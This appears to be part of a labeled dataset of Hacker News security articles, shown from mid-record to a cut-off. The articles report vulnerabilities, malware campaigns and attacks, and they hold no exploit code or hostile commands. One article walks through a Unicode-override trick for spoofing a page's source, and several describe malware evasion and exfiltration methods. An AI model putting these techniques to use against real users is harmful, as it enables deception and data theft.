""Site Isolation makes it harder for untrusted websites to access or steal information from your accounts on other websites. Websites typically cannot access each other's data inside the browser, thanks to code that enforces the Same Origin Policy."" Google says.
Here's how to turn on Site Isolation:
Copy chrome://flags/#enable-site-per-process and paste it into the URL field at the top of your Chrome web browser, and then hit the Enter key.
Look for Strict Site Isolation, then click the box labelled Enable.
Once done, hit Relaunch Now to relaunch your Chrome browser.
Linux Distributions
The Linux kernel developers have also released patches for the Linux kernel with releases including versions 4.14.11, 4.9.74, 4.4.109, 3.16.52, 3.18.91 and 3.2.97, which can be downloaded from Kernel.org.
VMware and Citrix
A global leader in cloud computing and virtualisation, VMware, has also released a list of its products affected by the two attacks and security updates for its ESXi, Workstation and Fusion products to patch against Meltdown attacks.
On the other hand, another popular cloud computing and virtualisation vendor Citrix did not release any security patches to address the issue. Instead, the company guided its customers and recommended them to check for any update on relevant third-party software.
",Vulnerability
Exclusive - Source Code Spoofing with HTML5 and the LRO Character,https://thehackernews.com/2012/03/exclusive-source-code-spoofing-with.html,"Exclusive - Source Code Spoofing with HTML5 and the LRO Character
Article Written by John Kurlak for The Hacker News,He is senior studying Computer Science at Virginia Tech. Today John will teach us that How to Spoof the Source Code of a web page. For example, Open https://www.kurlak.com/john/source.html and Try to View Source Code of the Page ;-) Can you View ??
About eight months ago, I learned about HTML5's new JavaScript feature, history.replaceState(). The history.replaceState() function allows a site developer to modify the URL of the current history entry without refreshing the page. For example, I could use the history.replaceState() function to change the URL of my page in the address bar from ""https://www.kurlak.com/example.html"" to ""https://www.kurlak.com/example2.html"" When I first learned of the history.replaceState() function, I was both skeptical and curious.
First, I wanted to see if history.replaceState() supported changing the entire URL of a page, including the hostname. Fortunately, the developers were smart enough to prevent that kind of action. Next, I noticed that if I viewed the source code of a page after replacing the URL, it attempted to show the source code of the new page. I started brainstorming ways I could make the URL look the same but have a different underlying representation. Such a scenario would make it so that I could ""hide"" the source code of a page by masking it with another page. I remembered encountering a special Unicode character some time back that reversed all text that came after it. That character is called the ""right to left override"" (RLO) and can be produced with decimal code 8238.
I tried to create an HTML page, ""source.html,"" that would use history.replaceState() to replace the URL of the page with: [RLO] + ""lmth.ecruos"" (the reversed text of ""source.html""). When the browser rendered the new URL, the RLO character reversed the letters after it, making the browser display ""source.html"" in the address bar. However, when I went to view the source of the web page, my browser tried to view the source of ""‮lmth.ecruos"" instead (the characters, ""‮,"" are the ASCII representation of the hex codes used to represent the RLO character). Thus, I created a page, ""‮lmth.ecruos"" and put some ""fake"" source code inside. Now, when I went to ""source.html,"" the URL was replaced with one that rendered the same, and when I viewed the source of the page, it showed my ""fake"" source code.
The code I used for ""source.html"" was:
However, there was a downfall: if the user tried to type after the RLO character in the address bar, his or her text would show up backwards, a clear indication that something strange was going on. I brainstormed additional solutions. I soon found that there was also a ""left to right override"" (LRO) character. I discovered that placing the LRO character within text that is already oriented left to right does not do anything. I decided to add the LRO character to the end of my URL and used the following code:
Then, I simply had to create ""source.htmlâ€"" and put my ""fake"" source code in it. It worked! Now the user could type normally without seeing anything funny.
However, this new code still has two downfalls.
The first downfall is that the script appears to work only for Google Chrome (I tested the script in Chrome 17.0.963.79 m). Firefox 11 escapes the RLO character, so the user sees ""%E2%80%AElmth.ecruos"" in the URL bar instead of ""source.html."" (I have had reports, however, that the ""exploit"" works in Firefox 11 on Linux. I have not yet confirmed those reports). Internet Explorer 9 does not yet support history.replaceState(), but apparently Internet Explore 10 will. Opera 11 and Safari 5 both show ""source.html"" in the address bar, but when I go to view the page source, both browsers bring up the code for the original ""source.html.""
The second downfall is that if the user tries to refresh the page, he or she will be taken to the fake HTML page. As far as I know, there is no sure way to prevent this side effect.
Finally, I would like to point out that this ""exploit"" is just a cool trick. It cannot be used to prevent someone from retrieving the source code of a web page. If a browser can access a page's source code, a human can access that page's source code.
Maybe someone else can think of a more interesting use of the trick. I hope you like it!
You can download both sample files Here
Submitted By : John Kurlak
Website: https://www.kurlak.com
",Vulnerability
Critical OS X Flaw Grants Mac Keychain Access to Malware,https://thehackernews.com/2015/09/mac-os-x-vulnerability.html,"Back in July, a security researcher disclosed a zero-day vulnerability in Mac OS X that allowed attackers to obtain unrestricted root user privileges with the help of code that even fits in a tweet.
The same vulnerability has now been upgraded to again infect Mac OS X machines even after Apple fixed the issue last month.
The privilege-escalation bug was once used to circumvent security protections and gain full control of Mac computers. Thanks to the environment variable DYLD_PRINT_TO_FILE Apple added to the code of OS X 10.10 Yosemite.
The vulnerability then allowed attackers to install malware and adware onto a target Mac, running OS X 10.10 (Yosemite), without requiring victims to enter system passwords.
However, the company fixed the critical issue in the Mac OS X 10.11 El Capitan Beta builds as well as the latest stable version of Mac OS X – Version 10.10.5.
Mac Keychain Flaw
Now, security researchers from anti-malware firm MalwareBytes spotted the updated version of the same highly questionable malicious installer is now accessing user's Mac OS X keychain without user's permission.
Once executed, the updated installer throws an installer request that asks for permission to access the user's OS X keychain.
The installer automatically simulates a click on the ""Allow"" button as soon as it appears, which allows it to gain access to the Safari Extensions List, said MalwareBytes researcher Thomas Reed.
This allows the malicious installer to install a Genieo Safari extension. The entire process of installing a malicious extension and gain access to OS X keychain takes just a fraction of a second.
You're Totally Screwed Up
However, the more worrisome part is that the installer could easily be modified to grant attackers access to other data from the keychain alongside passwords for user's Gmail account, iCloud account, and other important accounts.
Meanwhile, two security researchers from Beirut independently reported the Mac Keychain vulnerability on Tuesday, the same day Malwarebytes researchers disclosed their findings involving Genieo.
The technique works on Mac systems only when invoked by an app already installed on user's systems.
The issue is critical because the Mac keychain is supposedly the protected place for storing account passwords and cryptographic keys.
Apple has yet to respond to this latest issue. Until then, Mac users are advised to follow the standard security practices, such as do not download files from unknown or untrusted sources, and be wary of emails or websites that seem suspicious.
",Vulnerability
"Chinese APT Espionage campaign, dubbed 'Icefog' targeted Military contractors and Governments",https://thehackernews.com/2013/09/chinese-apt-espionage-campaign-dubbed.html,"Kaspersky Lab has identified another Chinese APT campaign, dubbed 'Icefog', who targeted Governmental institutions, Military contractors, maritime / shipbuilding groups, telecom operators, industrial and high technology companies and mass media.
The Hacking group behind the attack who carry out surgical hit and run operations, is an advanced persistent threat (APT) group, used a backdoor dubbed Icefog that worked across Windows and Mac OS X to gain access to systems.
""The Mac OS X backdoor currently remains largely undetected by security solutions and has managed to infect several hundred victims worldwide,"" the report (PDF) said.
This China-based campaign is almost two years old and follows the pattern of similar APT-style attacks where victims are compromised via a malicious attachment in a spear-phishing email, or are lured to a compromised website and infected with malware.
The attackers embed exploits for several known vulnerabilities (CVE-2012-1856 and CVE-2012-0158) into Microsoft Word and Excel documents.
Once a computer has been compromised, the hackers upload malicious tools and backdoors. They look for email account credentials, sensitive documents and passwords to other systems.
""We observed many victims in several other countries, including Taiwan, Hong Kong, China, USA, Australia, Canada, UK, Italy, Germany, Austria, Singapore, Belarus and Malaysia,"" the research team said.
There is no concrete evidence to confirm this was a nation-state sponsored operation, but based on where the stolen data were transferred to, Kaspersky wrote the attackers are assumed to be in China, South Korea and Japan.
In total, Kaspersky Lab observed more than 4,000 uniquely infected IPs and several hundred victims. They are now in contact with the targeted organizations as well as government entities in order to help them identify and eradicate the infections.
",Malware
New ComRAT Malware Uses Gmail to Receive Commands and Exfiltrate Data,https://thehackernews.com/2020/05/gmail-malware-hacker.html,"Cybersecurity researchers today uncovered a new advanced version of ComRAT backdoor, one of the earliest known backdoors used by the Turla APT group, that leverages Gmail's web interface to covertly receive commands and exfiltrate sensitive data.
""ComRAT v4 was first seen in 2017 and known still to be in use as recently as January 2020,"" cybersecurity firm ESET said in a report shared with The Hacker News. ""We identified at least three targets: two Ministries of Foreign Affairs in Eastern Europe and a national parliament in the Caucasus region.""
Turla, also known as Snake, has been active for over a decade with a long history of the watering hole and spear-phishing campaigns against embassies and military organizations at least since 2004.
The group's espionage platform started off as Agent.BTZ, in 2007, before it evolved to ComRAT, in addition to gaining additional capabilities to achieve persistence and to steal data from a local network.
It is now known that earlier versions of Agent.BTZ were responsible for infecting US military networks in the Middle East in 2008. In recent years, Turla is said to have been behind the compromise of French Armed Forces in 2018 and the Austrian Foreign Ministry early this year.
Newer versions of ComRAT backdoor have since ditched Agent. BTZ's USB-stick infection mechanism in favor of injecting itself into every process of the infected machine and executing its primary payload in ""explorer.exe.""
What's New in ComRAT v4?
The ComRAT v4 (or ""Chinch"" by the malware authors), as the new successor is called, uses an entirely new code base and is far more complex than its earlier variants, according to ESET. The firm said the first known sample of the malware was detected in April 2017.
ComRAT is typically installed via PowerStallion, a lightweight PowerShell backdoor used by Turla to install other backdoors. In addition, the PowerShell loader injects a module called ComRAT orchestrator into the web browser, which employs two different channels — a legacy and an email mode — to receive commands from a C2 server and exfiltrate information to the operators.
""The main use of ComRAT is discovering, stealing, and exfiltrating confidential documents,"" the researchers said. ""In one case, its operators even deployed a .NET executable to interact with the victim's central MS SQL Server database containing the organization's documents.""
What's more, all the files related to ComRAT, with the exception of the orchestrator DLL and the scheduled task for persistence, are stored in a virtual file system (VFS).
The ""mail"" mode works by reading the email address and the authentication cookies located in the VFS, connecting to the basic HTML view of Gmail, and parsing the inbox HTML page (using Gumbo HTML parser) to get the list of emails with subject lines that match those in a ""subject.str"" file in the VFS.
For each email that meets the above criteria, the comRAT proceeds by downloading the attachments (e.g. ""document.docx,"" ""documents.xlsx""), and deleting the emails to avoid processing them a second time.
Despite the "".docx"" and "".xlsx"" format in the filenames, the attachments are not documents themselves, but rather encrypted blobs of data that include a specific command to be executed: read/write files, execute additional processes, and gather logs.
In the final stage, the results of the command execution are encrypted and stored in an attachment (with the double extension "".jpg.bfe""), which is then sent as an email to a target address specified in the ""answer_addr.str"" VFS file.
The ""legacy"" mode, on the other hand, makes use of the already existing C2 infrastructure (ComRAT v3.x) to issue remote commands, the results of which are compressed and transmitted to a cloud service such as Microsoft OneDrive or 4Shared.
The exfiltrated data comprises user details and security-related log files to check if their malware samples were detected during a scan of the infected systems.
Based on the Gmail email distribution patterns over a one-month period, ESET said the operators behind the campaign are working in the UTC+3 or UTC+4 time zones.
""Version four of ComRAT is a totally revamped malware family released in 2017,"" ESET researcher Matthieu Faou said. ""Its most interesting features are the Virtual File System in FAT16 format and the ability to use the Gmail web UI to receive commands and exfiltrate data. Thus, it is able to bypass some security controls because it doesn't rely on any malicious domain.""
",Cyber_Attack
Hackers Can Remotely Steal Fingerprints From Android Phones,https://thehackernews.com/2015/08/hacking-android-fingerprint.html,"Over a year ago I wrote an article on The Hacker News that warned of serious security concerns created by the iPhone and Android's Fingerprint authentication.
Till now hackers were impersonated simply by lifting prints off the side of a phone and gaining unauthorized access to user's phone and thus data.
However, security researchers have now discovered four new ways to attack Android devices to extract user fingerprints remotely without letting the user know about it.
The attack, which the researchers dubbed the ""Fingerprint Sensor Spying attack,"" could be used by hackers to ""remotely harvest fingerprints in a large scale,"" Yulong Zhang, one of the researchers told ZDNet.
Remotely Hacking Android Fingerprints
FireEye researchers Tao Wei and Yulong Zhang presented their research in a talk titled, Fingerprints on Mobile Devices: Abusing and Leaking, at the Black Hat conference in Las Vegas on Wednesday, where they outlined new ways to attack Android devices in an effort to extract user fingerprints.
The new attack is limited mostly to Android devices with Fingerprint Sensors that helps the user to authenticate their identity by simply touching their phone's screen, instead of by entering a passcode.
Researchers confirmed the attack on the HTC One Max and Samsung's Galaxy S5, which allowed them to stealthily obtain a fingerprint image from the device because vendors don't lock down fingerprint sensors well enough.
The attack affects mobile phones by major manufacturers including handsets delivered by Samsung, HTC, and Huawei.
Fingerprints vs. Passwords
If we give a thought, then stolen fingerprints would be an even worse scenario than stolen passwords because you can change your passwords when breached but not just replace your fingerprints.
""In this attack, victims' fingerprint data directly fall into attacker's hand. For the rest of the victim's life, the attacker can keep using the fingerprint data to do other malicious things,"" said Zhang.
The good news is that the issue is relatively easy to fix by adding encryption to the fingerprint data on Android devices, and affected vendors have since released patches after being alerted by the researchers.
Researchers have not shared any ""proof-of-concept"" detailing exactly how the fingerprint stealing attack can be executed remotely.
Meanwhile Apple users can just sit and relax, as it appears that iPhone and iPad's Touch ID is ""quite secure"" because it encrypts fingerprint data from the scanner with a crypto key, making it unreadable even if hackers gain access.
Users need to note that Google doesn't yet officially support fingerprints in its mobile operating system, but it will soon do support fingerprint sensors with the Android M update.
",Vulnerability
WhatsApp Flaw Lets Users Modify Group Chats to Spread Fake News,https://thehackernews.com/2018/08/whatsapp-modify-chat-fake-news.html,"WhatsApp, the most popular messaging application in the world, has been found vulnerable to multiple security vulnerabilities that could allow malicious users to intercept and modify the content of messages sent in both private as well as group conversations.
Discovered by security researchers at Israeli security firm Check Point, the flaws take advantage of a loophole in WhatsApp's security protocols to change the content of the messages, allowing malicious users to create and spread misinformation or fake news from ""what appear to be trusted sources.""
The flaws reside in the way WhatsApp mobile application connects with the WhatsApp Web and decrypts end-to-end encrypted messages using the protobuf2 protocol.
The vulnerabilities could allow hackers to misuse the 'quote' feature in a WhatsApp group conversation to change the identity of the sender, or alter the content of someone else's reply to a group chat, or even send private messages to one of the group participants (but invisible to other members) disguised as a group message for all.
In an example, the researchers were able to change a WhatsApp chat entry that said ""Great!""—sent by one member of a group—to read ""I'm going to die, in a hospital right now!""
It should be noted that the reported vulnerabilities do not allow a third person to intercept or modify end-to-end encrypted WhatsApp messages, but instead, the flaws could be exploited only by malicious users who are already part of group conversations.
Video Demonstration — How to Modify WhatsApp Chats
To exploit these vulnerabilities, the CheckPoint researchers—Dikla Barda, Roman Zaikin, and Oded Vanunu—created a new custom extension for the popular web application security software Burp Suite, allowing them to easily intercept and modify sent and received encrypted messages on their WhatsApp Web.
The tool, which they named ""WhatsApp Protocol Decryption Burp Tool,"" is available for free on Github, and first requires an attacker to input its private and public keys, which can be obtained easily ""obtained from the key generation phase from WhatsApp Web before the QR code is generated,"" as explained by the trio in a blog post.
""By decrypting the WhatsApp communication, we were able to see all the parameters that are actually sent between the mobile version of WhatsApp and the Web version. This allowed us to then be able to manipulate them and start looking for security issues.""
In the above-shown YouTube video, researchers demonstrated the three different techniques they have developed, which allowed them to:
Attack 1 — Changing a Correspondent's Reply To Put Words in Their Mouth
Using the Burp Suite extension, a malicious WhatsApp user can alter the content of someone else's reply, essentially putting words in their mouth, as shown in the video.
Attack 2 — Change the Identity of a Sender in a Group Chat, Even If They Are Not a Member
The attack allows a malicious user in a WhatsApp group to exploit the 'quote' feature—that lets users reply to a past message within a chat by tagging it—in a conversation to spoof a reply message to impersonate another group member and even a non-existing group member.
Attack 3 — Send a Private Message in a Chat Group But When The Recipient Replies, The Whole Group Sees It
The third WhatsApp attack allows a malicious group user to send a specially crafted message that only a specific person will be able to see. If the targeted individual responds to the same message, only then its content will get displayed to everyone in the group.
WhatsApp/Facebook Choose to Left Reported Attacks Unpatched
The trio reported the flaws to the WhatsApp security team, but the company argued that since these messages do not break the fundamental functionality of the end-to-end encryption, users ""always have the option of blocking a sender who tries to spoof messages and they can report problematic content to us.""
""These are known design trade-offs that have been previously raised in public, including by Signal in a 2014 blog post, and we do not intend to make any change to WhatsApp at this time,"" WhatsApp security team replied to the researchers.
Another argument WhatsApp shared with researchers, in context of why the company can not stop the modification of the message content—""This is a known edge case that relates to the fact that we do not store messages on our servers and do not have a single source of truth for these messages.""
""My point was the misinformation, and WhatsApp plays a vital role in our day activity. So, In my point of view they indeed have to fix these issues,"" CheckPoint researcher Roman Zaikin said.
""It's always functionality vs. security, and this time WhatsApp choose functionality.""
Since WhatsApp has become one of the biggest tools to spread fake news and misinformation, at least in countries with highly volatile political issues, we believe WhatsApp should fix these problems along with putting limits on the forwarded messages.
",Vulnerability
Air Traffic Control System Failure Caused by Memory Shortage - A Cyber Attack?,https://thehackernews.com/2014/05/air-traffic-control-system-failure.html,"A shortage of computer memory in the $2.4 billion Air Traffic Control System caused a Computer crash that resulted in the System collapse, according to an insider close to the incident.
The problems began on 30 April, when a U-2 spy plane flew over southwestern US caused the air traffic control system that manages the airspace around Los Angeles' LAX airport, built by Lockheed Martin, to crash due to which hundreds of flight delayed or cancelled two weeks ago.
""In theory, the same vulnerability could have been used by an attacker in a deliberate shut-down,"" security experts told Reuters. Now that the ""very basic limitation of the system"" is known, experts showed concerns about the cyber-attacks.
Sources claimed to Reuters that on April 30, 2014 the aircraft traffic failed to obtain the altitude information for a single U-2 spy plane which was flying over the area because a controller entered the altitude of the spook flight into the En Route Automation Modernisation (ERAM) system, developed by Lockheed Martin.
Lockheed Martin created the En Route Automation Modernization (ERAM) air traffic control system, claims it conducts ""robust testing"" on all its systems, so the shortage of altitude information in the U-2's flight plan caused the automated system to generate error messages and begin cycling through restarts.
I NEED MORE MEMORY
The system failure was caused due to the complex nature of the U-2's flight plan. The U-2's flight ERAM system failed because it limits how much data each plane can send it, however most of the aircraft have a simple flight plan do not exceed the limits as it restrict the data sent back to the ERAM.
While an air traffic controller entered the usual altitude for a U-2 plane i.e. about 60,000 feet, the system began to calculate all possible altitudes between ground level and infinity for the flight, in order to ensure the U-2 plane wasn't on a crash course with other aircrafts.
Now this process need ""a large amount of available memory and interrupted the computer's other flight-processing functions,"" according to a Federal Aviation Administration (FAA) spokesperson, Laura Brown.
As a result, the air traffic system was completely fails to access parts of the US skies from West Coast to Arizona and from Nevada to the Mexico border. No accidents or injuries were reported, however it caused inconvenience to thousands of passengers who had their flights delayed or cancelled.
In response, the FAA said it has changed the way traffic controllers obtain flight plan information and upgraded the computer systems with more memory, which should prevent similar episodes from occurring in the future.
A CYBER ATTACK?
Where some security experts say that the incident could be a part of cyber attack deliberately caused by hackers, others argue it would be impossible to recreate such specific conditions. Sources told Reuters that the original error is very difficult to replicate and added that there's no indication that it could be used to carry out any cyber attack.
But according to security experts, it could be a cyber attack and the failure appeared to have been made possible by the sort of routine programming mistake that should have been identified in testing before it was deployed.
Cyber attacks against physical infrastructure are becoming an interesting area for the hackers, however there are very few such activities seen in real scenario, the most famous among is Stuxnet case, used against uranium centrifuges in Iran.
",Cyber_Attack
Google Drive Vulnerability Leaks Users' Private Data,https://thehackernews.com/2014/07/google-drive-vulnerability-leaks-users_9.html,"Another privacy issue has been discovered in Google Drive which could have led sensitive and personal information stored on the cloud service exposed to unauthorized parties.
The security flaw has now patched by Google, but its discovery indicates that the vulnerability of cloud data when accessed via a link can allow ""anyone who has the link"" to access your private data without any further authentication.
HOW THE SECURITY FLAW WORKS
The security hole addressed a risk to files that included a clickable URL on your cloud file sharing service.
When someone opens the file and clicks on an embedded hyperlink, then they get sent to the website of a third-party website owner.
Upon accessing this URL, unfortunately the external Internet user - an unauthorized party - could potentially access your sensitive information by accessing the original documents that included the URL.
GOOGLE EXPLANATION
Google explained the actual nature of the security flaw in a blog post published last week. The company said that the flaw only affected a ""small subset of file types"" in Google Drive.
The security issue is relevant only if all four of these conditions apply:
The file was uploaded to Google Drive
The file was not converted to Docs, Sheets, or Slides (i.e., remained in its original format such as .pdf, .docx, etc.)
The owner changed sharing settings so that the document was available to ""anyone with the link""
The file contained hyperlinks to third-party HTTPS websites in its content
If all the above mentioned conditions applied, a user who clicked on the embedded hyperlink could have inadvertently sent header information to the administrator of the third-party websites, allowing him or her to potentially see the URL of the original document that linked to his or her site.
But Google assured its users that the newly shared documents with hyperlinks to third-party HTTPS websites, will not inadvertently relay the original document's URL.
HOW TO PROTECT YOURSELF
At the same time, If you've got any of yours previously shared documents that match any of those above four criteria, Google says you can generate a new and safe sharing link by following just three simple steps:
Create a copy of the document, via File > ""Make a copy...""
Share the copy of the document with particular people or via a new shareable link, via the ""Share"" button
Delete the original document
The security flaw is similar to Dropbox hyperlink disclosure vulnerability discovered earlier this year by Intralinks. The hyperlink disclosure vulnerability in the Dropbox led to the exposure of personal documents and all sorts of stuff such as such as tax returns, bank records, mortgage applications, blueprints, and business plans, stored in Dropbox that you would not want to disclose.
",Vulnerability
Zeus malware targeting BlackBerry and Android devices,https://thehackernews.com/2012/08/zeus-malware-targeting-blackberry-and.html,"Security researchers at Kaspersky Lab have discovered five new samples of the ZeuS-in-the-Mobile (ZitMo) malware package, targeting Android and BlackBerry devices.
Zitmo (Zeus in the mobile) is the name given to the mobile versions of Zeus, and it's been around for a couple of years already, mostly infecting Android phones. The Zitmo variant has reportedly been operating for at least two years targeting Android phones by masquerading as banking security application or security add-on.
ZitMo gets hold of banking information by intercepting all text messages and passing them on to attackers' own devices. It gets onto devices inside malicious applications, which users are duped into downloading. In this case, the malicious app was posing as security software called 'Zertifikat'.
Once installed, the packages forward all incoming SMS messages to one of two command and control numbers located in Sweden, with the aim of snaring secure codes and other data. Kaspersky found mobile users in Spain, Italy and Germany were targeted by these fresh variants, with two command and control (C&C) numbers found on Sweden's Tele2 operator.
""The analysis of new Blackberry ZitMo files showed that there are no major changes. Virus writers finally fixed grammar mistake in the 'App Instaled OK' phrase, which is sent via SMS to C&C cell phone number when smartphone has been infected. Instead of 'BLOCK ON' or 'BLOCK OFF' commands (blocking or unblocking all incoming and outgoing calls) now there are 'BLOCK' and 'UNBLOCK' commands. Other commands which are received via SMS remain the same."" Denis Maslennikov, a researcher at Kaspersky Lab.
The tactic is designed to help the criminals circumvent the out-of-band authentication systems used by many European banks, by hijacking the one-time password authentication password sent via SMS.
Earlier this year, Kaspersky warned of a set of malicious Android applications posing as security software. Zeus was sitting behind those apps, ready to siphon off text messages.
",Malware
Hacker Tried Poisoning Water Supply After Breaking Into Florida's Treatment System,https://thehackernews.com/2021/02/hacker-tried-poisoning-water-supply.html,"Hackers successfully infiltrated the computer system controlling a water treatment facility in the U.S. state of Florida and remotely changed a setting that drastically altered the levels of sodium hydroxide (NaOH) in the water.
During a press conference held yesterday, Pinellas County Sheriff Bob Gualtieri said an operator managed to catch the manipulation in real-time and restored the concentration levels to undo the damage.
""At no time was there a significant effect on the water being treated, and more importantly the public was never in danger,"" Sheriff Gualtieri said in a statement.
The water treatment facility, which is located in the city of Oldsmar and serves about 15,000 residents, is said to have been breached for approximately 3 to 5 minutes by unknown suspects on February 5, with the remote access occurring twice at 8:00 a.m. and 1:30 p.m.
The attacker briefly increased the amount of sodium hydroxide from 100 parts-per-million to 11,100 parts-per-million using a system that allows for remote access via TeamViewer, a tool that lets users monitor and troubleshoot any system problems from other locations.
""At 1:30 p.m., a plant operator witnessed a second remote access user opening various functions in the system that control the amount of sodium hydroxide in the water,"" the officials said.
Sodium hydroxide, also known as lye, is a corrosive compound used in small amounts to control the acidity of water. In high and undiluted concentrations, it can be toxic and can cause irritation to the skin and eyes.
It is not immediately known if the hack was done from within the U.S. or outside the country. Detectives with the Digital Forensics Unit said an investigation into the incident is ongoing.
Although an early intervention averted more serious consequences, the sabotage attempt highlights the exposure of critical infrastructure facilities and industrial control systems to cyberattacks.
The fact that the attacker leveraged TeamViewer to take over the system underscores the need for securing access with multi-factor authentication and preventing such systems from being externally accessible.
""Manually identify software installed on hosts, particularly those critical to the industrial environment such as operator workstations — such as TeamViewer or VNC,"" said Dragos researcher Ben Miller. ""Accessing this on a host-by-host basis may not be practical but it is comprehensive.""
""Remote access requirements should be determined, including what IP addresses, what communication types, and what processes can be monitored. All others should be disabled by default. Remote access including process control should be limited as much as possible.""
",Cyber_Attack
Rombertik Malware Destroys Hard Drives to Avoid Detection,https://thehackernews.com/2015/05/malware-destroy-hard-drive.html,"Security researchers have discovered a new strain of malware that makes use of extraordinary measures to evade detection and analysis, making the computer it infects unusable.
Dubbed Rombertik, which is ""unique"" among other self-destructing malware samples due to its unique evasion techniques. As soon as any analysis tool is detected, Rombertik attempts to delete the device's Master Boot Record (MBR) and home directories, making the machine constantly restart.
Rombertik is a complex piece of spyware designed to ""indiscriminately"" collect everything a user does online in order to obtain victim's login credentials and other confidential information.
Infects users via Phishing campaign:
Rombertik typically gets installed on vulnerable machines when users click on malicious attachments included in phishing emails, Cisco security researchers Ben Baker and Alex Chiu said in a blog post Monday.
Once loaded into the system, Rombertik first runs a series of anti-analysis checks to determine if it is running within a sandbox.
In case it isn't running within the sandbox, Rombertik decrypts and installs itself on the victim's machine, which then allows the malware to launch a second copy of itself and overwrite the second copy with the malware's core spying functionality.
Here's the kicker:
After completing this process and before begins spying on users, Rombertik runs a final check to make sure it is not being analyzed in memory. In case it finds any indication of being analyzed, the spyware attempts to destroy the master boot record (MBR) of the vulnerable computer.
Rombertik then restarts the machine, and because now the MBR is missing from the hard drive, the victim's computer will go into an endless restart loop.
MBR is the first sector of a computer's hard drive that the system looks for before loading the operating system. However, deleting or destroying MBR involves re-installing of operating system, which means valuable data is lost.
In cases where the malware is under the microscope of security experts or any rival malware author, Rombertik will self-destruct itself, taking the contents of a victim's hard drive along with it.
Security researchers reverse-engineered the malware and found that Rombertik contains volumes of ""garbage code"" that have to be analyzed. The researchers were able to capture a small sample and found that…
...the unpacked Rombertik sample was 28KB in size while the packed version is 1264KB, including 75 images and 8,000 functions that are never used.
Rombertik other Tricks involve:
Moreover, Rombertik keeps itself in sandboxes by writing a random byte of data to memory 960 million times in an effort to overwhelm analysis tools that try to detect malware by logging system activity.
""If an analysis tool attempted to log all of the 960 million write instructions, the log would grow to over 100 gigabytes,"" researchers explained in a blog post.
""Even if the analysis environment was capable of handling a log that large, it would take over 25 minutes just to write that much data to a typical hard drive. This complicates the analysis.""
Data wiping and Self-destructing malware:
Data wiping and self-destructing malware are not new. In last three years, we have seen a hike in malware evasion capabilities.
Wiper malware was used against South Korean banks and TV broadcasters in 2013 as well as against Sony Pictures Entertainment last year, which marked history in a massive data breach.
Also last year, the German Aerospace Centre was targeted by a self-destructive malware in an espionage attack, believed to be conducted by China.
TIP
The best way to keep your systems away from such malware is to have a best antivirus for PCs, as well as avoid opening malicious or suspicious links served via phishing emails.
",Malware
Apple's Find My Network Can be Abused to Exfiltrate Data From Nearby Devices,https://thehackernews.com/2021/05/apples-find-my-network-can-be-abused-to.html,"Latest research has demonstrated a new exploit that enables arbitrary data to be uploaded from devices that are not connected to the Internet by simply sending ""Find My"" Bluetooth broadcasts to nearby Apple devices.
""It's possible to upload arbitrary data from non-internet-connected devices by sending Find My [Bluetooth Low Energy] broadcasts to nearby Apple devices that then upload the data for you,"" Positive Security researcher Fabian Bräunlein said in a technical write-up disclosed last week.
The study builds on a previous analysis by TU Darmstadt published in March 2021, which disclosed two distinct design and implementation flaws in Apple's crowdsourced Bluetooth location tracking system that could lead to a location correlation attack and unauthorized access to a user's location history of the past seven days.
The investigation was augmented by the release of a framework called OpenHaystack that's designed to let any user create an ""AirTag,"" enabling individuals to track personal Bluetooth devices via Apple's massive Find My network.
But the reverse engineering of Apple's Find My offline finding system also left the door open to the possibility that the protocol could be emulated to upload arbitrary data to the Internet by broadcasting the information via Bluetooth beacons that would get picked up by Apple devices in close physical proximity, and then subsequently relay the encrypted data to Apple's servers, from where a macOS application can retrieve, decode, and display the uploaded data.
One of the core aspects of Find My is its rotating key scheme consisting of a pair of public-private keys that are deterministically changed every 15 minutes, with the public key sent within the Bluetooth Low Energy advertisement packet.
Thus when nearby Apple devices such as MacBooks, iPhones, and iPads receive the broadcast, they fetch their own location, then encrypt the location using the aforementioned public key before sending the encrypted location report to iCloud along with a hash of the public key. In the final step, the owner of the lost device can use a second Apple device signed in with the same Apple ID to access the approximate location.
The encryption protections mean that not only does Apple not know which public keys belong to a specific lost device or AirTag, it also doesn't have any knowledge of which location reports are intended for a specific user — hence the above Apple ID requirement. ""The security solely lies in the encryption of the location reports: The location can only be decrypted with the correct private key, which is infeasible to brute force and only stored on the paired Owner Device,"" Bräunlein said.
The idea, therefore, is to exploit this gap by encoding a message into the broadcast payloads and then obtaining them on the other end using a data fetcher component based on OpenHaystack that decrypts and extracts the information transmitted from the sender device, say, a microcontroller.
""When sending, the data is encoded in the public keys that are broadcasted by the microcontroller. Nearby Apple devices will pick up those broadcasts and forward the data to an Apple backend as part of their location reporting. Those reports can later be retrieved by any Mac device to decode the sent data,"" Bräunlein explained.
While malicious real-world implications of such an exploit may seem moot, it's also difficult for Apple to defend against an attack of this kind due to the inherent end-to-end encrypted nature of the Find My network.
To counter any potential misuse, the researcher suggests hardening the system in two possible ways, including authenticating the BLE advertisement and applying rate limits on-location report retrievals by caching the hashes and ensuring that the only ""16 new key ids are queried per 15 minutes and Apple ID."" It's worth noting that there is a limit of 16 AirTags per Apple ID.
""In the world of high-security networks, where combining lasers and scanners seems to be a noteworthy technique to bridge the air gap, the visitor's Apple devices might also become feasible intermediaries to exfiltrate data from certain air gapped systems or Faraday caged rooms,"" Bräunlein said.
",Malware
Chinese search engine Baidu launches free Antivirus Suite,https://thehackernews.com/2013/03/chinese-search-engine-baidu-launches.html,"Chinese search engine Baidu has just launched a security product called Baidu Antivirus 2013. Described as a ultra light weight, easy to use, extremely fast anti-virus program that promises to protect your system from malware, viruses, spyware, adware and other malicious programs.
Most interesting thing is that Baidu Antivirus comes only in English. Back in January, Baidu launched Baidu PC Faster, a software suite designed to fix speed and performance issues.
The program combines the Baidu Antivirus Engine and Baidu Cloud Security Engine with the Avira Antivirus engine to provide you with complete protection against all online threats.
""Baidu Antivirus offers an easy to use interface with several advanced configuration options as well as quarantine of infected files. It also has an extremely small memory footprint, so you can actually do other things while it is running on your computer. Other features include automatic updates, Host Intrusion Prevention System (HIPS), scan reports and more."" description reads.
You can download Baidu Antivirus 2013 here and please note that, its a Chinese product, so use at your own risk !
",Malware
Hackers threaten to take down Xbox Live and PSN on Christmas Day,https://thehackernews.com/2016/12/christmas-ddos-attack.html,"Bad news for gamers!
It's once again the time when most of you will get new PlayStations and XBoxes that continue to be among the most popular gifts for Christmas, but possibilities are you'll not be able to log into the online gaming console, just like what happens on every Christmas holidays.
On 2014 Christmas holidays, the notorious hacker group Lizard Squad knocked the PlayStation Network and Xbox Live offline for many gamers by launching massive DDoS attacks against the gaming networks.
